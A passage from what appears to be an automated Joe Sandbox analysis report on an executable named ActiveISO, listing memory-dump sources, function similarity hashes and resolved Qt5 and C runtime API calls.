                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: 2f4a8e5d1b1b3da6c629e8d5ff6f291349ccd92db2ce8ede9ae026f9f6c7fe08
                                                                                                                  • Instruction ID: e8ef57d1924c2945b62ec1b030c6cc9e04cef515cc0696c477e8d15cea7a01bf
                                                                                                                  • Opcode Fuzzy Hash: 2f4a8e5d1b1b3da6c629e8d5ff6f291349ccd92db2ce8ede9ae026f9f6c7fe08
                                                                                                                  • Instruction Fuzzy Hash: 3C319F72F14A4586DB09DF66E4516ACB7A1F785F84B088432DF1EA7798CE38D4A28344
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 65c48216a36dbf53750b56a6e26f256233e890bf9229bf5118050fb41578e629
                                                                                                                  • Instruction ID: 54bcffa0481b5a413914e4fe47e176a51e6d993640086eb55b7cfbe46a90e279
                                                                                                                  • Opcode Fuzzy Hash: 65c48216a36dbf53750b56a6e26f256233e890bf9229bf5118050fb41578e629
                                                                                                                  • Instruction Fuzzy Hash: 9D3192A6F24B5293EA4ACB57E50116D63A2FB44FD0F488432CE6DA7754DF38E0A6C304
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$freemallocmemmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738371499-0
                                                                                                                  • Opcode ID: 9b20f279c1b8f4d369c68e49f5b52779f95114d91f1556d7d00d4c93b983c339
                                                                                                                  • Instruction ID: 5b1518fa51b2b718c414fc967b875970fa878919760decb8beb50a096667845d
                                                                                                                  • Opcode Fuzzy Hash: 9b20f279c1b8f4d369c68e49f5b52779f95114d91f1556d7d00d4c93b983c339
                                                                                                                  • Instruction Fuzzy Hash: D431D461A25B8587EA64CB26E4523BDB3A2FB45F80F088435DB9EA3B54DF3CE0418304
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: f330f6315041567011bdca5e119cffffefe9d932d5c3e9d922a0a9c7d6fb6763
                                                                                                                  • Instruction ID: 8d90ebf58dcf2e62b7defc906b6b616fa32d104ce87fd60c06ee53b04b83c1f3
                                                                                                                  • Opcode Fuzzy Hash: f330f6315041567011bdca5e119cffffefe9d932d5c3e9d922a0a9c7d6fb6763
                                                                                                                  • Instruction Fuzzy Hash: E821C572F28A8587EA598F16E14126D63A2FB99FC4F5C8431DF1EA7750DF38D4528304
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$freemallocmemmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738371499-0
                                                                                                                  • Opcode ID: 0027ec25ef49326e3862034060804eef1cb74cd8ac323708d115d74a5c6196e8
                                                                                                                  • Instruction ID: 44dadb98af831cd378e0acd1a7851cb686e4cf463c7971beea32a95bf1d5e827
                                                                                                                  • Opcode Fuzzy Hash: 0027ec25ef49326e3862034060804eef1cb74cd8ac323708d115d74a5c6196e8
                                                                                                                  • Instruction Fuzzy Hash: A32190B2A24B8186EB08CF66E5510AD73A1FB48FD4B488436DF6DA7358DF38D452C384
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: 676408751d5a00d33d52a57e2095f492ad5194ad74b8dfcb421448cc946ec1a9
                                                                                                                  • Instruction ID: eb8e67897445cf5238a8d4ed4f073fc935f4fe00083c167715d350587a72d439
                                                                                                                  • Opcode Fuzzy Hash: 676408751d5a00d33d52a57e2095f492ad5194ad74b8dfcb421448cc946ec1a9
                                                                                                                  • Instruction Fuzzy Hash: E311D361E28B8186EB48CB66F44216C63A1EB88FD4F4C8435DE5DA7759DF38C4A28344
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_BurnerCdvdGrabber_Star$Create$Speeds
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1686240895-0
                                                                                                                  • Opcode ID: f127eea520f7fbcf939784d838ccb12e9c675a38635e1339eadf9a5ac5e35830
                                                                                                                  • Instruction ID: 0f28a11ce5008ebd203825a71e03f305433322795b3ef6a8d9b0d2c16bce102b
                                                                                                                  • Opcode Fuzzy Hash: f127eea520f7fbcf939784d838ccb12e9c675a38635e1339eadf9a5ac5e35830
                                                                                                                  • Instruction Fuzzy Hash: BC517D73A19B828AE761CB64F4913AE77A8F745748F540126EB8C67B59DF38C248CB04
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?dispose@Data@1@@Data@@ListString@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3454606168-0
                                                                                                                  • Opcode ID: 43c6b6017defd00d4f6cec0b67517bbced066856cecc4d426e3781a71d38af02
                                                                                                                  • Instruction ID: e68b2d2a65125db6e8a929b8a41f983911ea89fbaf05b1bf44368d797d01e71b
                                                                                                                  • Opcode Fuzzy Hash: 43c6b6017defd00d4f6cec0b67517bbced066856cecc4d426e3781a71d38af02
                                                                                                                  • Instruction Fuzzy Hash: C9317C22F29A4186E760EF25E54613923A2FB04FA4F5D4131CA1EF7758DF38E846C348
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?dispose@Data@1@@Data@@File@@ListString@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2356814245-0
                                                                                                                  • Opcode ID: 241f1cd17ea5242eb1a4b7bb607036e64f2df22773cb0107efdce25c02278cf1
                                                                                                                  • Instruction ID: ace0f8bc52b4267e29e217199989c27f3c6d61ba16669ce1cba0c4bc7057b957
                                                                                                                  • Opcode Fuzzy Hash: 241f1cd17ea5242eb1a4b7bb607036e64f2df22773cb0107efdce25c02278cf1
                                                                                                                  • Instruction Fuzzy Hash: 7A218132E24A0282EB50AF2AD85213C33A2EB45FA4F6C4131D91DF3794DE3DD846C744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?dispose@Data@1@@Data@@FileIconListProvider@@String@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 105501149-0
                                                                                                                  • Opcode ID: b50b168d9d3f73cd6a7ccf297253cf1a4cda6625e37aa46563781e759bb44b19
                                                                                                                  • Instruction ID: d7a81d16a4a4cf4028e959dac56ad3b3829130de123cfa96a41f9bf9e9ec6be0
                                                                                                                  • Opcode Fuzzy Hash: b50b168d9d3f73cd6a7ccf297253cf1a4cda6625e37aa46563781e759bb44b19
                                                                                                                  • Instruction Fuzzy Hash: BD119032E24A4282EB648F2AE86213D3362FB85F64F5C4131D91DF7394EE2CD846C784
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?dispose@Data@1@@Data@@FileIconListProvider@@String@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 105501149-0
                                                                                                                  • Opcode ID: e4d353747d0e03a085a4cd66e60f185e18d6ac9c4a81c18ada1b69f763a3ce0f
                                                                                                                  • Instruction ID: 3e3c3cd5a3b90cd1acad0e28df87bdb3c317a3679355aad549a20f7c7f0d1c37
                                                                                                                  • Opcode Fuzzy Hash: e4d353747d0e03a085a4cd66e60f185e18d6ac9c4a81c18ada1b69f763a3ce0f
                                                                                                                  • Instruction Fuzzy Hash: 8F117F32E24A0286EB508F2AE86216933A2EB85FA4F5D4131D91DB73A4DE2DD845C744
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653731877
                                                                                                                  • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FF653731885
                                                                                                                  • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653731896
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF6537318A2
                                                                                                                    • Part of subcall function 00007FF653731B20: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FF653731958,?,?,?,00007FF6537314DE), ref: 00007FF653731B68
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach@?end@Array@@ByteData@1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3506969666-0
                                                                                                                  • Opcode ID: 5f56cfdee5a5b0017e237b807499104a2c51a29c00af5921e21a46cfcbfb5684
                                                                                                                  • Instruction ID: c634e0cd5dd6aea6a7605405e26544d372ddef51a46e216c0030682a0cbf463a
                                                                                                                  • Opcode Fuzzy Hash: 5f56cfdee5a5b0017e237b807499104a2c51a29c00af5921e21a46cfcbfb5684
                                                                                                                  • Instruction Fuzzy Hash: 6D017C21F1965246F6506B67A845069A3A2EF89FE0F084234DE2DF3B94DF3CD4974B08
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$String@@$?activate@?clear@?delete?flush@Array@@ByteDevice@@FileLater@MetaV0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3738466369-0
                                                                                                                  • Opcode ID: 12ca341e9a45685477b9ac0fbb24e809448adce8d9137692487557ba00da4176
                                                                                                                  • Instruction ID: c00de76c7c1f5ed566e389042607fefba8c80e81e4f9fdae0df006994f1e50a7
                                                                                                                  • Opcode Fuzzy Hash: 12ca341e9a45685477b9ac0fbb24e809448adce8d9137692487557ba00da4176
                                                                                                                  • Instruction Fuzzy Hash: 5F113626B29A01A2EA08DB62D59523D2362FB88FD4F084031DE4EA3F24CF2CE465C345
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF6537286B5
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF6537286CB
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF6537286F3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653728703
                                                                                                                    • Part of subcall function 00007FF653714300: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653714317
                                                                                                                    • Part of subcall function 00007FF653714300: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FF653714325
                                                                                                                    • Part of subcall function 00007FF653714300: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653714336
                                                                                                                    • Part of subcall function 00007FF653714300: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653714342
                                                                                                                    • Part of subcall function 00007FF653714300: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653714397
                                                                                                                    • Part of subcall function 00007FF653714300: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FF6537143A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$String@@$?detach@?dispose@?end@Data@1@Data@1@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3710840839-0
                                                                                                                  • Opcode ID: 4f7ea9ef63ddbe07e0898dfd8f4331d21c3b9f70ac3e72727685692c27fef3ac
                                                                                                                  • Instruction ID: df1f3b62dd983b67af7ee5ebc075387ef7ac57ef8188d422f8d446e907c0dfd6
                                                                                                                  • Opcode Fuzzy Hash: 4f7ea9ef63ddbe07e0898dfd8f4331d21c3b9f70ac3e72727685692c27fef3ac
                                                                                                                  • Instruction Fuzzy Hash: E9011B32F1890586EA049B56DA9607D6363FB88FC0B5C8035DA0E67761CF3DD4508784
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653744040: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653744067
                                                                                                                    • Part of subcall function 00007FF653744040: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374408E
                                                                                                                    • Part of subcall function 00007FF653744040: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537440B1
                                                                                                                    • Part of subcall function 00007FF653744040: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF6537440BD
                                                                                                                  • ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF653744C55
                                                                                                                  • ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF653744C5F
                                                                                                                    • Part of subcall function 00007FF6537480D0: memset.VCRUNTIME140 ref: 00007FF65374810A
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653744C7C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744C88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
